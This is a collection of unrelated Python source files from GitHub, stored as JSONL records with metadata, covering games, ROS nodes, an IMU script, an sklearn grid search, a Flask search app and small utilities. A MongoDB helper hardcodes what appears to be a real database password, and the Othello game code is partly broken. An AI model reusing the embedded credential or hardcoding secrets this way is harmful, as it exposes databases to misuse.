current_color\n\n def on_board(self, x, y):\n \"\"\"A helper method for in bounds\"\"\"\n if x <= 7 and x >= 0 and y <= 7 and y >= 0:\n return True\n\n def other_color(self):\n if self.counter % 2 == 0:\n other_color = 1\n else:\n other_color = 0\n\n return other_color\n\n def game_over(self):\n \"\"\"A method which provides the scores at the end of the game\"\"\"\n black_score = 0\n white_score = 0\n for row in self.piece.total_row:\n for move in row:\n if move.color == 0:\n black_score += 1\n elif move.color == 1:\n white_score += 1\n if black_score > white_score:\n score_1 = black_score\n score_2 = white_score\n winner = 'Player wins:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". format(winner, score_1, score_2),\n self.width/2 - self.width/3, self.width/2)\n # If the player wins, the program will prompt the user for their\n # name to be placed in the scores file. If the user's score is\n # greater than the highest score, their name and score will be\n # listed on the top of the scores list.\n\n def input(self, message=''):\n from javax.swing import JOptionPane\n return JOptionPane.showInputDialog(frame, message)\n answer = input('enter your name')\n if answer:\n print('Hi ' + answer)\n elif answer == '':\n print('[empty string]')\n else:\n print(answer)\n scores_list = []\n f = open('scores.txt', 'r+')\n data_list = []\n result = answer + \" \" + str(score_1)\n for line in f:\n data_list.append(line)\n if len(data_list) == 0:\n f.write(result)\n else:\n first_line = data_list[0].split()\n score = int(first_line[-1])\n if score_1 > score:\n for i in range(len(data_list)):\n result += '\\n' + data_list[i]\n f.seek(0)\n f.write(result)\n else:\n result = '\\n' + result\n f.write(result)\n f.close()\n elif white_score > black_score:\n score_1 = black_score\n score_2 = white_score\n winner = 'Computer wins:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". format(winner, score_2, score_1),\n self.width/2 - self.width/3, self.width/2)\n else:\n score_1 = black_score\n score_2 = white_score\n winner = 'Tie game:'\n fill(255, 0, 0)\n textSize(20)\n text(\"Gameover. {} {} - {}\". 
format(winner, score_2, score_1),\n self.width/2 - self.width/3, self.width/2)\n","repo_name":"Ryan-Ray-Martin/PythonProjects","sub_path":"Othello Game Python/othello_game/game_controller.py","file_name":"game_controller.py","file_ext":"py","file_size_in_byte":9201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34110438501","text":"ROUND_RESULT = {\n 'X' : 'LOSE',\n 'Y' : 'DRAW',\n 'Z' : 'WIN'\n}\n\nROCK = {\n 'WIN' : 'paper',\n 'DRAW' : 'rock',\n 'LOSE' : 'scissors'\n}\n\nPAPER = {\n 'WIN' : 'scissors',\n 'DRAW' : 'paper',\n 'LOSE' : 'rock'\n}\n\nSCISSORS = {\n 'WIN' : 'rock',\n 'DRAW' : 'scissors',\n 'LOSE' : 'paper'\n}\n\ndef player_move(elf_choice, round_result):\n expected_result = ROUND_RESULT[round_result]\n if elf_choice == 'A':\n return ROCK[expected_result]\n elif elf_choice == 'B':\n return PAPER[expected_result]\n else:\n return SCISSORS[expected_result]\n\nprint(player_move('A', 'Z'))","repo_name":"sghendryx/Advent-of-Code-2022","sub_path":"2022_Python/Day 2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73876516625","text":"import hashlib\nimport os\n\n\ndef get_str_md5(str):\n md5_obj = hashlib.md5()\n md5_obj.update(str.encode('utf-8'))\n return md5_obj.hexdigest()\n\n\ndef get_file_md5(filepath):\n if os.path.isfile(filepath):\n md5_obj = hashlib.md5()\n f = open(filepath, 'rb')\n while True:\n b = f.read(8096)\n if not b:\n break\n md5_obj.update(b)\n f.close()\n return md5_obj.hexdigest()\n\n\nif __name__ == '__main__':\n print(get_str_md5(\"http://localhost:8000/users/login/\"))\n # print(fileMD5('D:\\\\Download\\\\Xunlei\\\\Solo.A.Star.Wars.Story.2018.1080p.BluRay.x264-SPARKS[rarbg]\\\\solo.a.star.wars.story.2018.1080p.bluray.x264-sparks.mkv'))\n\n","repo_name":"ChenjxJames/xyb","sub_path":"base/MD5.py","file_name":"MD5.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17929394626","text":"#!/usr/bin/env python\n###############################################################################\n# Duckietown - Project Unicorn ETH\n# Author: Simon Schaefer\n# Subscribe and store compressed image. 
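Each incoming CompressedImage message is converted to an OpenCV frame via cv_bridge and written to the configured storage directory as an incrementing PNG.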
\n###############################################################################\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom os.path import isdir\nimport rospy\nfrom sensor_msgs.msg import CompressedImage\n\nclass Main(): \n\n    def __init__(self): \n        self.bridge = CvBridge()\n        topic = rospy.get_param(\"/imagemsg_to_png/img_topic\")\n        rospy.Subscriber(topic, CompressedImage, self.callback)\n        self.i = 0\n        self.storage_path = rospy.get_param(\"/imagemsg_to_png/storage_dir\")\n        if not isdir(self.storage_path): \n            raise OSError(\"Invalid storage path !\")\n        rospy.spin()\n    \n    def callback(self, data):\n        \"\"\"Store message data as png.\"\"\"\n        try: \n            frame = self.bridge.compressed_imgmsg_to_cv2(data, \"bgr8\")\n        except CvBridgeError as e:\n            rospy.logfatal(e)\n            return  # conversion failed, so frame is undefined - skip writing this message\n        name = self.storage_path + \"/\" + str(self.i) + \".png\"\n        cv2.imwrite(name, frame)\n        self.i += 1\n\nif __name__ == '__main__':\n    rospy.init_node('converter_imagemsg_png', anonymous=True)\n    try:\n        Main()\n    except rospy.ROSInterruptException:\n        cv2.destroyAllWindows()\n","repo_name":"duckietown-project-unicorn/bag_tools","sub_path":"src/imagemsg_to_png.py","file_name":"imagemsg_to_png.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"29619346310","text":"from graphql_tests.helper import base_url\nimport requests\nfrom test_contactBySlug import test_contactBySlug\n\nquery = \"\"\"\nquery allToolIntegrations($id: ID!, $after: String, $first: Int) {\n  tool(id: $id) {\n    allToolIntegrations(first: $first, after: $after) {\n      count\n      pageInfo {\n        hasNextPage\n        endCursor\n        __typename\n      }\n      edges {\n        node {\n          imageUrl\n          thumbUrl\n          thumbRetinaUrl\n          name\n          id\n          slug\n          path\n          __typename\n        }\n        __typename\n      }\n      __typename\n    }\n    id\n    __typename\n  }\n}\n\"\"\"\n\n\ndef test_allToolIntegrations():\n    tool_id = test_contactBySlug()\n    variables = {\n        \"first\": 9,\n        \"id\": tool_id\n    }\n    response = requests.post(base_url, json={\"query\": query, \"variables\": variables})\n    response.raise_for_status()  # fail on HTTP errors before touching the payload\n    data = response.json()['data']\n    assert data['tool']['allToolIntegrations']['count'] > 0\n","repo_name":"elizabethmalikova/stackshare_graphql_tests","sub_path":"graphql_tests/unauth_tests/test_allToolIntegrations.py","file_name":"test_allToolIntegrations.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"23959035003","text":"# ARGUMENTS : Filename of the stemmed corpus\n# RETURNS : A tuple containing InvertedIndex, List of unique docs and Dict of document length\n\ndef invertedIndex(fileName):\n\tf = open(fileName, 'r')\n\tindex = {}\n\tdocTokens = []\n\tdocID = 0\n\tdocList = []\n\tdocLength = {}\n\tfor line in f:\n\t\tif line != '\\n':\n\t\t\tif line[0] == '#':\t\t\t\t\t\t\t\t\t\t\t\t# Break which indicates new document\n\t\t\t\tif len(docTokens) == 0:\n\t\t\t\t\tdocTokens = []\n\t\t\t\t\tdocID = int(line[1:])\n\t\t\t\t\tdocList.append(docID)\n\t\t\t\telse:\n\t\t\t\t\tindex = addToIndex(docTokens, docID, index)\n\t\t\t\t\tdocLength[docID] = len(docTokens)\n\t\t\t\t\tdocTokens = []\n\t\t\t\t\tdocID = int(line[1:])\n\t\t\t\t\tdocList.append(docID)\n\t\t\telse:\n\t\t\t\ttokens = line.split(' ')\n\t\t\t\ttokens[-1] = tokens[-1].split('\\n').pop(0)\n\t\t\t\ttokens = [token for token in tokens if not token.isdigit()] # Ignores all number only tokens \n\t\t\t\tdocTokens = docTokens + tokens\n\n\n\tindex = addToIndex(docTokens, docID, 
index)\n\tdocList.append(docID)\n\tdocLength[docID] = len(docTokens)\n\treturn (index, list(set(docList)), docLength) \t\t\t\t\t\t\t# Final tuple that is returned\n\n\n\n# ARGUMENTS : List of tokens in a document\n# RETURNS : Frequency of each term in the document as a Dictionary\ndef termFrequency(tokens):\n\tdistinctTokens = list(set(tokens))\n\tfreqDict = {}\n\tfor token in distinctTokens:\n\t\tfreqDict[token] = tokens.count(token)\n\n\treturn freqDict\n\n\n# ARGUMENTS : Tokens in a doc, Document ID, InvertedIndex\n# RETURNS : An updated inverted index with the doc ID and term frequency\ndef addToIndex(docTokens, docID, index):\n\tfreqDict = termFrequency(docTokens)\n\tfor token in list(set(docTokens)):\n\t\tif token in index:\n\t\t\tindex[token].append((docID, freqDict[token]))\n\t\telse:\n\t\t\tindex[token] = []\n\t\t\tindex[token].append((docID, freqDict[token]))\n\treturn index\n\n\n\n# print invertedIndex('tokens.txt')","repo_name":"kdin/BM25-Ranking","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11056592489","text":"import time\nimport board\nimport adafruit_bno055\nimport numpy as np\n\n\ni2c = board.I2C()\nsensor = adafruit_bno055.BNO055_I2C(i2c)\n\nlast_val = 0xFFFF\nprevR = np.eye(3)\n\ndef rotationMatrix():\n global prevR\n eAngles = sensor.euler\n Rx = np.array([[1, 0, 0],\n [0, np.cos(eAngles[0]), -1*np.sin(eAngles[0])],\n [0, np.sin(eAngles[0]), np.cos(eAngles[0])]])\n Ry = -1*np.array([[np.cos(eAngles[2]), 0, np.sin(eAngles[2])],\n [0, 1, 0],\n [-1*np.sin(eAngles[2]), 0, np.cos(eAngles[2])]])\n Rz = np.array([[np.cos(eAngles[1]), -1*np.sin(eAngles[1]), 0],\n [np.sin(eAngles[1]), np.cos(eAngles[1]), 0],\n [0, 0, 1]])\n R = np.dot(Rz, np.dot(Ry, Rx))\n R_t = np.transpose(R)\n Rdelta = np.dot(R_t, prevR)\n prevR = R\n return Rdelta\n\nif __name__ == \"__main__\":\n while True:\n \tprint(\"Euler angles: {}\".format(sensor.euler))\n \tprint(\"Rotation matrix: \\n\\r{}\".format(rotationMatrix()))\n \ttime.sleep(1)\n","repo_name":"pianoman373/scrying-stone-software","sub_path":"IMU_rotation.py","file_name":"IMU_rotation.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"26466066440","text":"import pandas as pd\r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\ndigits = datasets.load_digits()\r\n\r\nmodel_parameters = {\r\n 'svm': {\r\n 'model': svm.SVC(gamma='auto'),\r\n 'parameters' : {\r\n 'C': [1,10,20],\r\n 'kernel': ['rbf','linear']\r\n } \r\n },\r\n 'random_forest': {\r\n 'model': RandomForestClassifier(),\r\n 'parameters' : {\r\n 'n_estimators': [1,5,10]\r\n }\r\n },\r\n 'logistic_regression' : {\r\n 'model': LogisticRegression(solver='liblinear',multi_class='auto'),\r\n 'parameters': {\r\n 'C': [1,5,10]\r\n }\r\n },\r\n 'naive_bayes_gaussian': {\r\n 'model': GaussianNB(),\r\n 'parameters': {}\r\n },\r\n 'naive_bayes_multinomial': {\r\n 'model': MultinomialNB(),\r\n 'parameters': {}\r\n },\r\n 'decision_tree': {\r\n 'model': DecisionTreeClassifier(),\r\n 'parameters': {\r\n 'criterion': 
['gini','entropy'],\r\n            \r\n        }\r\n    } \r\n}\r\n\r\nscores = []\r\nfor model_name, model_parameter in model_parameters.items():\r\n    clf = GridSearchCV(model_parameter['model'], model_parameter['parameters'], cv=5, return_train_score=False)\r\n    clf.fit(digits.data, digits.target)\r\n    scores.append({\r\n        'model': model_name,\r\n        'best_score': clf.best_score_,\r\n        'best_params': clf.best_params_\r\n    })\r\n    \r\ndf = pd.DataFrame(scores,columns=['model','best_score','best_params'])\r\n","repo_name":"nkhalil98/machine-learning","sub_path":"Hyper Parameter Tuning/hyper_paramerter_tuning.py","file_name":"hyper_paramerter_tuning.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"73538041107","text":"# Create an Employee class.\n# # 📌 Reuse the Person class from the previous task.\n# # 📌 An employee must have:\n# # ○ a six-digit identification number\n# # ○ an access level computed as the remainder of dividing\n# # the sum of the id's digits by seven\n\nfrom task_3 import Person\n\n\nclass Employee(Person):\n    MAX_LEVEL = 7\n\n    def __init__(self, name: str, surname: str, patronymic: str, age: int, id: int):\n        super().__init__(name, surname, patronymic, age)\n        if 100_000 <= id < 1_000_000:\n            self.id = id\n        else:\n            self.id = 100_000\n\n    def get_level(self):\n        sum_num = sum(int(num) for num in str(self.id))\n        return sum_num % self.MAX_LEVEL\n\n\n# vasya_2 = Person('Vasya', 'Pupkin', 'Andreevich', 24)\n\n\nnew_employee = Employee('Vasya', 'Pupkin', 'Andreevich', 24, 102_342)\nprint(new_employee.full_name())\nprint(new_employee.get_level())","repo_name":"ValeryBurlakov/python_based","sub_path":"seminars/seminar_10/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"21240415952","text":"#this program will implement a game called Ricerca Binaria\n\n\n#this function is just a welcome page to the program\ndef welcomepage():\n    print(\"\"\"Greetings human.\nI am going to pick a number between 17 and 666, inclusive.\nIt is up to you to figure out what number I have chosen.\"\"\")\n    \n#this function will generate a random number between 17 and 666, inclusive\nimport random\ndef randomnum():\n    randnum = random.randrange(17, 666+1)\n    return randnum\n\n#this function will prompt the user to guess the generated number\ndef guessgame(num):\n    print (\"I have picked a number, and you have 17 guesses... good luck guessing...\")\n    guess = 0\n    i = 1\n    while guess != num and i < 18:\n        if i == 17:\n            print(\"This is your last guess.\")\n        guess = int(input(\"Enter guess #\" + str(i) + \": \"))\n        i += 1\n        if guess > num:\n            print(\"Too high, human.\")\n        elif guess < num:\n            print(\"Too low, human.\")\n        elif guess == num:\n            print (\"Congratulations, you guessed correctly!\")\n            print (\"I guess I'll spare your life.\")\n    if i == 18 and guess != num:\n        print (\"You are going to die now, sorry.\")\n    \ndef main():\n    welcomepage()\n    startup = input(\"Are you ready? 
y or n: \")\n if startup == \"y\":\n print(\"Wise choice.\")\n guessgame(randomnum())\n if startup == \"n\":\n print(\"Too bad.\")\n guessgame(randomnum())\nmain()\n \n \n","repo_name":"cyberLaVoy/coursework","sub_path":"py-games/misc/ricerca-binaria.py","file_name":"ricerca-binaria.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"45229174212","text":"import torch\nimport numpy as np\nimport datetime\nfrom tqdm import tqdm\nimport torch\nimport torch.nn as nn\n\nfrom utils import *\nfrom clip_loss import *\n\nfrom beautifier import cyclegan_model\n\ndef load_generator_model(model_type, n=1, ngf=64, h=None, w=None, pretrained_model=None):\n\n generate = lambda g, z : g(z)\n\n if model_type == 'cyclegan':\n z = torch.rand((n, 3, h, w), device=device)\n gen = cyclegan_model.netG_A\n generate = lambda g, z : (g(z)+ 1)/2\n else:\n class Nothin(nn.Module):\n def __init__(self):\n super(Nothin, self).__init__()\n def forward(self, z):\n return z\n gen = Nothin()\n z = torch.rand((n, 3, h, w), device=device)\n generate = lambda g, z : g(z)\n\n # for param in gen.parameters():\n # param.requires_grad = True\n # gen.train()\n\n z.requires_grad = True\n\n for param in gen.parameters():\n param.requires_grad = False\n gen.eval()\n\n return gen, z, generate\n\n\n# Image Augmentation Transformation\naugment_trans, augment_trans_style, augment_change_clip = get_image_augmentation(True)\n\ndef alter_z_noise(z, squish=4, noise_std=1.):\n # Alter the params so the next image isn't exactly like the previous.\n with torch.no_grad():\n # z /= squish\n # #z += torch.rand(z.shape).to(device) * noise_std\n # noise = torch.rand(z.shape).to(device)#.clamp(-.2,.5)\n # z += noise * noise_std\n z /= squish\n z += torch.randn(z.shape).to(device) * noise_std\n return z\n\ndef generate_video( prompts, # List of text prompts to use to generate media\n h=9*40,w=16*40,\n lr=.1,\n num_augs=4,\n model_type='cyclegan',\n debug=True,\n frames_per_prompt=10, # Number of frames to dedicate to each prompt\n first_iter=300, # Number of optimization iterations for first first frame\n num_iter=50, # Optimization iterations for all but first frame\n z_unchanging_weight=3, # Weight to ensure z does not change at all * l1_loss(z, z_prev)\n z_noise_squish=4., # Amount to squish z by between frames\n carry_over_iter=17, # Which iteration of optimization to use as the start of the next frame\n encoding_comparison='cosine', # or \"emd\"\n n_samples=1):\n\n start_time, all_canvases = time(), []\n all_latents = []\n\n gen, z_for_next_frame, generate = load_generator_model(model_type, n=n_samples, ngf=666, h=h, w=w, pretrained_model=None)\n\n # Optimizers\n #optim, style_optim, z_optim = torch.optim.Adam([z], lr=lr), torch.optim.RMSprop([z], lr=lr), torch.optim.Adam([z], lr=lr)\n\n content_loss, z_loss, styleloss_tot = 0, 0, 0\n prev_z = None\n image_features, image_features_16 = None, None\n total_chunks = (len(prompts)-1) * 2*frames_per_prompt + frames_per_prompt\n pbar = tqdm(total=total_chunks)\n\n cosine_dist = lambda a, b: -1 * torch.cosine_similarity(a, b, dim=1)\n encoding_compare = cosine_dist if encoding_comparison == 'cosine' else EMD\n l1_loss = nn.L1Loss()\n\n for prompt_ind in range(len(prompts)):\n prompt_now = prompts[prompt_ind]\n prompt_next = prompts[prompt_ind+1] if prompt_ind < len(prompts)-1 else None\n\n with torch.no_grad():\n text_features_now = model.encode_text(clip.tokenize(prompt_now).to(device))\n 
text_features_next = model.encode_text(clip.tokenize(prompt_next).to(device)) if prompt_next is not None else None\n text_features_now_16 = model_16.encode_text(clip.tokenize(prompt_now).to(device))\n text_features_next_16 = model_16.encode_text(clip.tokenize(prompt_next).to(device)) if prompt_next is not None else None\n\n tot_frames = frames_per_prompt*2 if prompt_ind < len(prompts)-1 else frames_per_prompt\n for frame in range(tot_frames):\n # Assign a weight to the current and next prompts\n weight_now = 1 - (frame/(tot_frames))\n weight_next = frame/(tot_frames)\n if prompt_ind == (len(prompts) - 1): weight_now = 1.\n\n # Alter the params so the next image isn't exactly like the previous.\n z = alter_z_noise(z_for_next_frame, squish=z_noise_squish, noise_std=1.)\n z.requires_grad = True\n\n # Optimizers\n optim, style_optim, z_optim = torch.optim.Adam([z], lr=lr), torch.optim.RMSprop([z], lr=lr), torch.optim.Adam([z], lr=lr)\n\n # Save features from previous frame\n prev_image_features = image_features.detach() if image_features is not None else None\n prev_image_features_16 = image_features_16.detach() if image_features_16 is not None else None\n\n # Run the main optimization loop\n iterations = first_iter if (prompt_ind==0 and frame==0) else num_iter\n for t in range(iterations):\n\n ''' Loss that goes through cyclegan '''\n # if t > (0.75*iterations):\n # optim.zero_grad()\n # z_optim.zero_grad()\n # loss = 0\n\n # # Full Sentence Loss\n # im_batch = torch.cat([augment_trans(generate(gen, z)) for n in range(num_augs)])\n # image_features = model.encode_image(im_batch)\n # image_features_16 = model_16.encode_image(im_batch)\n # for n in range(num_augs):\n # loss -= torch.cosine_similarity(text_features_now, image_features[n:n+1], dim=1) * weight_now\n # # if text_features_prev is not None: loss -= torch.cosine_similarity(text_features_prev, image_features[n:n+1], dim=1)\n # #if text_features_next is not None: loss -= torch.cosine_similarity(text_features_next, image_features[n:n+1], dim=1) * weight_next\n\n # loss -= torch.cosine_similarity(text_features_now_16, image_features_16[n:n+1], dim=1) * weight_now\n # #if text_features_next_16 is not None: loss -= torch.cosine_similarity(text_features_next_16, image_features_16[n:n+1], dim=1) * weight_next\n\n # content_loss = loss.item()\n # loss.backward()\n # optim.step()\n\n ''' Loss that just operates on z '''\n ex_freq = 2 # Alternate between two clip models for robustness\n z_optim.zero_grad()\n loss = 0\n im_batch = torch.cat([augment_trans(z) for n in range(num_augs)])\n if t % ex_freq == 0:\n image_features_16 = model_16.encode_image(im_batch)\n else:\n image_features = model.encode_image(im_batch)\n for n in range(num_augs):\n # loss for clip features of z and text features (This and next prompt)\n if t % ex_freq == 0:\n loss += encoding_compare(text_features_now_16, image_features_16[n:n+1]) * weight_now\n if text_features_next_16 is not None: loss += encoding_compare(text_features_next_16, image_features_16[n:n+1]) * weight_next\n else:\n loss += encoding_compare(text_features_now, image_features[n:n+1]) * weight_now\n if text_features_next is not None: loss += encoding_compare(text_features_next, image_features[n:n+1]) * weight_next\n\n if prev_image_features is not None:\n # Loss to make sure that z doesn't change much\n if t % 4 == 0:\n loss += l1_loss(z, prev_z) * z_unchanging_weight\n\n loss.backward()\n z_loss = loss.item()\n z_optim.step()\n # z.data.clamp_(0,1)\n\n if t == carry_over_iter-1:\n z_for_next_frame = 
z.detach().clone()\n\n # if t % 10 == 0 and debug:\n # print(prompt_now)\n # # print('LR', optim.param_groups[0]['lr'], '\\tZL{:.3f}'.format(z_loss), '\\tCL{:.3f}'.format(content_loss),\n # # '\\tSL{:.3f}'.format(styleloss_tot), '\\t{:.3f}min.'.format((time()-start_time)/60))\n # gen.eval()\n # for i in range(len(z)):\n # with torch.no_grad():\n # z_norm = z.detach().clone()#.clamp(0,1)\n # img = generate(gen, z_norm).detach().cpu().numpy()[i]\n # show_img(img)\n # img = z_norm.detach().cpu().numpy()[i]\n # show_img(img)\n\n prev_z = z.detach().clone()\n pbar.update(1)\n gen.eval()\n\n with torch.no_grad():\n if model_type=='cyclegan':\n z_norm = z.detach().clone()#*2 - 1#.clamp(0,1)\n # z_norm = transforms.Resize((2*h, 2*w))(z_norm) # Double the size. Hurts quality, slightly\n img = generate(gen, z_norm).detach().cpu().numpy()[0]\n # show_img(z.detach().cpu().numpy()[0])\n else:\n img = generate(gen, z).detach().cpu().numpy()[0]\n img = draw_text_on_image(img, prompt_now)\n all_canvases.append(img)\n all_latents.append(z.detach().cpu().numpy()[0])\n # if frame % 4 == 0: print('Frame: ', frame), show_img(img)\n\n # to_gif(all_canvases, fn='/animation.gif')\n # from IPython.display import Image, display\n # ipython_img = Image(open('/animation.gif','rb').read())\n # display(ipython_img)\n\n # to_gif(all_canvases, fn='/content/drive/MyDrive/animations/{}.gif'.format(time()))\n if not os.path.exists('output'): os.mkdir('output')\n\n run_name = datetime.now().strftime(\"%m_%d__%H_%M_%S\")\n fn = os.path.join('output','{}.mp4'.format(run_name))\n to_video(all_canvases, frame_rate=8, fn=fn)\n # to_video(all_canvases, frame_rate=8)\n return all_canvases, all_latents\n\n#@title generate_video_wrapper\ndef generate_video_wrapper(prompts, frames_per_prompt=10, style_opt_iter=0, temperature=50, fast=False):\n lr = .17 if fast else .1\n num_iter = 10 if fast else 25\n carry_over_iter = 9 if fast else 13\n temperature = 0.5 * temperature if fast else temperature\n\n z_unchanging_weight = 4 - (temperature/100) * 4\n z_noise_squish = (temperature/100) * 4 + 2\n\n all_canvases, fn = generate_video( prompts, # List of text prompts to use to generate media\n # h=h,w=w,\n lr=lr,\n num_augs=4,\n debug=False,\n frames_per_prompt=frames_per_prompt, # Number of frames to dedicate to each prompt\n first_iter=50, # Number of optimization iterations for first first frame\n num_iter=num_iter, # Optimization iterations for all but first frame\n carry_over_iter=carry_over_iter,\n z_unchanging_weight=z_unchanging_weight, # Weight to ensure z does not change at all * l1_loss(z, z_prev)\n z_noise_squish=z_noise_squish, # Amount to squish z by between frames\n n_samples=1)\n return all_canvases\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser(\n description='Paint each frame of a video, and generate instruction files needed for robot painter.')\n\n # parser.add_argument(\"file\", type=str, help='Path of the video or image to paint.')\n parser.add_argument('--prompts', nargs='+', type=str, help='')\n parser.add_argument('--temperature', type=float, default=30)\n parser.add_argument('--slow', action=\"store_true\")\n\n args = parser.parse_args()\n\n all_canvases = generate_video_wrapper(args.prompts, frames_per_prompt=20,\n temperature=args.temperature, fast=not 
args.slow)","repo_name":"pschaldenbrand/Text2Video","sub_path":"text2video.py","file_name":"text2video.py","file_ext":"py","file_size_in_byte":12077,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"48"} +{"seq_id":"34888908360","text":"from pymongo import MongoClient\nfrom urllib import parse\n\n\n# connect to mongodb cloud and return the collection\ndef mongoConnect(name=\"Today\"):\n client = MongoClient(\"mongodb+srv://scarydonut:\" + parse.quote(\"YM7ZWNU5@mlab\") +\n \"@cluster0-o1llq.mongodb.net/test?retryWrites=true&w=majority\")\n db = client.Twenty20 \n collection = db[name]\n return collection \n","repo_name":"Rahul0598/Web-Articles","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14761437966","text":"from flask import Flask, render_template, request\nimport json\nimport operator\nfrom collections import defaultdict, Counter\n\napp = Flask(__name__)\nwith open(\"Query_Data/relations.json\", \"r\") as f:\n relations = json.load(f)\nwith open(\"Query_Data/text_mapping.json\", \"r\") as f:\n mappings = json.load(f)\nwith open(\"Query_Data/trigram_mappings.json\", \"r\") as f:\n tri_mappings_l = json.load(f)\n\ntrigram_mappings = {}\nfor k, v in tri_mappings_l.items():\n trigram_mappings[k] = set(v)\n\ndel tri_mappings_l\n\n\n\n\n@app.route('/')\ndef home():\n return render_template('search.html')\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n@app.route('/search', methods=['GET', 'POST'])\ndef search_request():\n search_term = request.form[\"input\"]\n if search_term.lower().strip() in mappings:\n uid = mappings[search_term.lower().strip()][0]\n old = relations[uid]\n res = old.copy()\n res[\"Old Query\"] = search_term\n else:\n new_query = get_similar(search_term.lower().strip())\n if new_query == \"\":\n uid = None\n res = {\"Number of Mentions\":0, \"Old Query\":search_term}\n else:\n uid = mappings[new_query.lower().strip()][0]\n old = relations[uid]\n res = old.copy()\n res[\"Old Query\"] = search_term\n res[\"New Query\"] = new_query\n\n return render_template('results.html', res=res)\n\n\ndef gjc(word, query):\n w3 = Counter([word[i:i+3] for i in range(len(word)-2)])\n q3 = Counter([query[i:i+3] for i in range(len(query)-2)])\n p = 0\n pd = 0\n for key in set(w3.keys()).union(q3.keys()):\n p += min(w3[key], q3[key])\n pd += max(w3[key], q3[key])\n \n if pd==0:\n return 0\n else:\n return p/pd\n\ndef get_similar(query):\n words = set()\n for g in [query[i:i+3] for i in range(len(query)-2)]:\n if g in trigram_mappings:\n words.update(trigram_mappings[g])\n\n if len(words)==0:\n return \"\"\n \n \n best_score = 0\n best_val = \"\"\n for word in words:\n sc = gjc(word, query)\n if sc>best_score:\n best_score = sc\n best_val = word\n return best_val\n\n\n\n\nif __name__ == '__main__':\n app.jinja_env.auto_reload = True\n app.config['TEMPLATES_AUTO_RELOAD'] = True\n\n app.secret_key = 'mysecret'\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"boun-tabi/vapur","sub_path":"Demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"16930637893","text":"import statistics\n\nfrom orca_msgs.msg import Barometer\nimport rclpy\nfrom rclpy.node import Node\nimport rclpy.time\n\n# How many messages (measurements) to sample?\n# Run `ros2 
bag info my_bag` to count messages in a ROS2 bag\nNUM_MEASUREMENTS = 2200\nTOPIC = '/filtered_barometer'\n\n\nclass CalcVarNode(Node):\n\n def __init__(self):\n super().__init__('calculate_variance')\n self._control_sub = self.create_subscription(Barometer, TOPIC, self.callback, 10)\n self._measurements = []\n self.get_logger().info(\n 'calc_var listening for {} messages on {}'.format(NUM_MEASUREMENTS, TOPIC))\n\n def callback(self, msg: Barometer):\n if len(self._measurements) == 0:\n self.get_logger().info('first message')\n\n self._measurements.append(msg.pressure)\n\n if 0 < NUM_MEASUREMENTS <= len(self._measurements):\n mean = statistics.mean(self._measurements)\n variance = statistics.variance(self._measurements, mean)\n self.get_logger().info('n: {}, mean: {}, variance: {}'.format(\n len(self._measurements), mean, variance))\n exit()\n\n\ndef main():\n rclpy.init()\n node = CalcVarNode()\n\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n node.get_logger().info('ctrl-C detected, shutting down')\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"clydemcqueen/orca2","sub_path":"orca_base/scripts/calc_var.py","file_name":"calc_var.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"28714059084","text":"import glob\nfrom csv import DictReader\nimport re\nimport os\nimport csv\n\n\n# increasing tolerance will increase matches but decrease match quality\ntolerance = 3\n# verbose will display match details\nverbose = True\n\n# 1/8 = 4131598.5\n# 1/4 = 8263197\n# 1/2 = 16526393\n# Load up to limit records in the csv\n# To load all records, set the number to max int / very lage value\nlimit = 4131599\n\n# WARNING worker.py:1047 -- Warning: The remote function __main__.find_matches_parallel has size 86233916 when pickled. It will be stored in Redis, which could cause memory issues. This may mean that its definition uses a large array or other object.\n\n\n\n# src: 